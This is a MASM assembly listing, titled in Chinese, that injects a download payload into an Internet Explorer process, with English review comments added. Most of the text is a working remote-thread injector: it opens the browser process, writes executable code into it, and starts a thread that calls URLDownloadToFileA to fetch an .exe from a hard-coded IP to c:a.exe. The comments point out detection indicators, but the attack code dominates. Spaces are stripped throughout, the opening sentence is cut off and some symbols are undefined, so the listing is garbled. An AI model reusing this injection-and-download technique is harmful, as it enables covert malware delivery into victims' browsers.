
注入下载文件的代码到IE进程然后执行下载的文件



大家可能都用过网页szFormatdbPID是:%d,0
szBufferdd20dup(0),0
piddd0
hProcessdd0
hThreaddd0
pCodeRemotedd0
path1dbc:a.EXE,0

.const
; Names resolved at run time by the injector (LoadLibrary + GetProcAddress
; below): the download API and the DLL that exports it.  The commented-out
; pair is the MessageBoxA test variant this payload was built from.
szmsgdbURLDownloadToFileA,0
userdlldbUrlmon.dll,0
;szmsgdbMessageBoxA,0
;userdlldbUser32.dll,0
szloadlibdbLoadLibraryA,0;note the difference from LoadLibraryW
kerdlldbkernel32.dll,0
; NOTE(review): szloadlib and kerdll are not referenced anywhere in the visible listing.

.code
; ---------------------------------------------------------------------------
; Position-independent payload that the injector copies verbatim into the
; target process.  Layout: [dispdata][szTit] = data (datalen bytes), then
; Rproc; codelen covers both, and the remote thread is started at
; codebegin + datalen, i.e. at Rproc.
; The literal URL and drop path below are the most direct indicators a
; defender can hunt for in this sample.
; ---------------------------------------------------------------------------
codebegin:
dispdatadb"http://192.168.0.5/NBTreeList.exe",0
szTitdb"c:a.exe",0
datalen=$-codebegin
; Rproc(msgbox): the single stack argument is the remote thread parameter,
; which the injector sets to the GetProcAddress result for szmsg; the
; parameter name is a leftover from the MessageBoxA variant.
Rprocprocmsgbox;the address of MessageBoxA is the parameter
CALL@F;pushesi
@@:
; CALL @F / POP EBX leaves the run-time address of @@ in EBX; subtracting
; the assemble-time OFFSET @B gives the relocation delta, so the LEAs below
; locate the strings wherever the block was written in the target process.
POPEBX
SUBEBX,OFFSET@B
LEAECX,[EBX+dispdata]
LEAEDX,[EBX+szTit]
; Five arguments pushed right to left for the function whose address is in msgbox
; (ecx = URL string, edx = local path string).
pushNULL
push0
pushedx
pushecx
pushNULL
callmsgbox
ret;important
Rprocendp
codelen=$-codebegin;code length xx bytes

start:
; ---------------------------------------------------------------------------
; Injector.  Classic remote-thread injection sequence:
;   FindWindow -> GetWindowThreadProcessId -> OpenProcess(PROCESS_ALL_ACCESS)
;   -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory
;   -> CreateRemoteThread(entry = pCodeRemote + datalen).
; A cross-process RWX allocation followed by a remote thread start on the
; same process handle is a pattern host-based detection tooling commonly
; flags.  The stale "calculator" comments suggest the technique was first
; tried against calc before being pointed at IE.
; ---------------------------------------------------------------------------
;invokeFindWindow,0,offsettit;returns the calculator window handle
invokeFindWindow,offsettit,0
; NOTE(review): `tit` is not defined in the visible part of the listing.
invokeGetWindowThreadProcessId,eax,offsetpid;PID of the calculator program's process
;invokewsprintf,offsetszBuffer,offsetszFormat,pid;display the PID in decimal
invokeOpenProcess,PROCESS_ALL_ACCESS,FALSE,pid;open the process and obtain its handle
movhProcess,eax;save the process handle


invokeVirtualAllocEx,hProcess,0,codelen,MEM_COMMIT,PAGE_EXECUTE_READWRITE
movpCodeRemote,eax
invokeWriteProcessMemory,hProcess,pCodeRemote,offsetcodebegin,codelen,NULL

; Thread entry = remote copy of Rproc; the datalen-byte data block comes first.
movesi,pCodeRemote
addesi,datalen
pushesi
; Resolve the download API in the injector's own address space and hand the
; pointer to the remote thread as its argument (Rproc's msgbox parameter).
invokeLoadLibrary,offsetuserdll
invokeGetProcAddress,eax,offsetszmsg
popesi
invokeCreateRemoteThread,hProcess,0,0,esi,eax,0,0

movhThread,eax;returned thread handle
.ifhThread
invokeWaitForSingleObject,hThread,INFINITE;wait for the thread to finish
invokeCloseHandle,hThread;close the thread handle
.endif

invokeVirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE;free
; NOTE(review): hProcess is never closed and nothing follows the free;
; the listing appears truncated here.
